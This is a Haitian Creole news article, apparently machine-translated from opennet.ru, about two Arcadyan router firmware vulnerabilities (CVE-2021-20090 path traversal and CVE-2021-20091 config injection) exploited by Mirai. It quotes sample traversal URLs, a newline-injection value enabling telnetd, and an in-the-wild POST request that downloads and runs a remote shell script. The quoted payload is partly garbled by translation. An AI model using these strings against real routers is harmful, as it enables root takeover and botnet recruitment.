Vilnerabilite nan routeurs lakay ki afekte 17 manifaktirè yo

Yo te anrejistre yon atak masiv sou rezo a kont routeurs lakay ki gen firmwèr itilize yon aplikasyon sèvè HTTP soti nan konpayi Arcadyan an. Pou jwenn kontwòl sou aparèy, yo itilize yon konbinezon de frajilite ki pèmèt ekzekisyon aleka kòd abitrè ak dwa rasin. Pwoblèm nan afekte yon pakèt routeurs ADSL ki soti nan Arcadyan, ASUS ak Buffalo, ansanm ak aparèy yo apwovizyone anba mak Beeline (pwoblèm nan konfime nan Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone ak lòt operatè telecom. Li te note ke pwoblèm nan te prezan nan firmwèr Arcadyan pou plis pase 10 ane ak pandan tan sa a te jere yo imigre nan omwen 20 modèl aparèy soti nan 17 manifaktirè diferan.

Premye vilnerabilite a, CVE-2021-20090, fè li posib jwenn aksè nan nenpòt script koòdone entènèt san otantifikasyon. Sans nan vilnerabilite a se ke nan koòdone entènèt la, kèk anyè atravè ki imaj, dosye CSS ak script JavaScript yo aksesib san otantifikasyon. Nan ka sa a, anyè pou yo gen aksè san otantifikasyon yo pèmèt yo tcheke avèk mask inisyal la. Espesifye "../" karaktè nan chemen pou ale nan anyè paran an bloke pa firmwèr la, men lè l sèvi avèk "..%2f" konbinezon an sote. Kidonk, li posib pou louvri paj pwoteje lè w ap voye demann tankou "http://192.168.1.1/images/..%2findex.htm".

Dezyèm vilnerabilite a, CVE-2021-20091, pèmèt yon itilizatè otantifye fè chanjman nan paramèt sistèm nan aparèy la lè li voye paramèt espesyal fòma nan script apply_abstract.cgi a, ki pa tcheke pou prezans yon karaktè newline nan paramèt yo. . Pou egzanp, lè w ap fè yon operasyon ping, yon atakè ka presize valè "192.168.1.2%0AARC_SYS_TelnetdEnable=1" nan jaden an ak adrès IP la ke yo tcheke, ak script la, lè yo kreye dosye a anviwònman /tmp/etc/config/. .glbcfg, pral ekri liy "AARC_SYS_TelnetdEnable=1" nan li ", ki aktive sèvè telnetd la, ki bay aksè shell lòd san restriksyon ak dwa rasin. Menm jan an tou, lè w mete paramèt AARC_SYS la, ou ka egzekite nenpòt kòd sou sistèm nan. Premye vilnerabilite a fè li posib pou kouri yon script pwoblèm san otantifikasyon lè w gen aksè a li kòm "/images/..%2fapply_abstract.cgi".

Pou eksplwate vilnerabilite, yon atakè dwe kapab voye yon demann nan pò rezo a sou ki koòdone entènèt la ap kouri. Jije pa dinamik pwopagasyon atak la, anpil operatè kite aksè sou aparèy yo nan rezo ekstèn pou senplifye dyagnostik pwoblèm nan sèvis sipò yo. Si aksè nan koòdone a limite sèlman nan rezo entèn la, yon atak ka fèt soti nan yon rezo ekstèn lè l sèvi avèk "DNS rebinding" teknik la. Vilnerabilite yo deja itilize aktivman pou konekte routè ak botne Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Koneksyon: fèmen Ajan itilizatè: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX

Sous: opennet.ru

Add nouvo kòmantè